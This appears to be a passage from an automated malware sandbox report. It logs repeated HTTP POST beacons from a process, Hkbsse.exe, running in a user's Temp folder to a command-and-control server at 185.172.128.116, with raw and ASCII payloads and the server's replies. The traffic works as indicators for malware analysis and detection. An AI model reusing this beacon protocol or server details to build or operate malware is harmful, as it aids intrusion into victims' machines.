                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        26192.168.2.558998185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:23.830255985 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:24.499397993 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:24 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:24.500521898 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:24.695102930 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:24 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        27192.168.2.558999185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:24.814299107 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:25.448209047 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:25 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:25.449086905 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:25.789349079 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:25 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        28192.168.2.559000185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:25.909914970 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:26.563066006 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:26 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:26.564018011 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:26.764332056 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:26 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        29192.168.2.559001185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:27.169373035 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:27.823421001 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:27 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:27.824260950 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:28.019181013 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:27 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        30192.168.2.559002185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:28.141762018 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:28.810480118 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:28 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:28.811280012 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:29.009679079 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:28 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        31192.168.2.559003185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:29.126380920 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:29.789067030 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:29 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:29.789850950 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:29.998754978 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:29 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        32192.168.2.559004185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:30.110852957 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:30.755207062 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:30 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:30.757142067 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:30.949738026 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:30 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        33192.168.2.559005185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:31.064230919 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:31.719168901 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:31 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:31.721847057 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:31.917385101 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:31 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        34192.168.2.559006185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:32.032651901 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:32.677678108 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:32 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:32.678524017 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:32.874319077 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:32 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
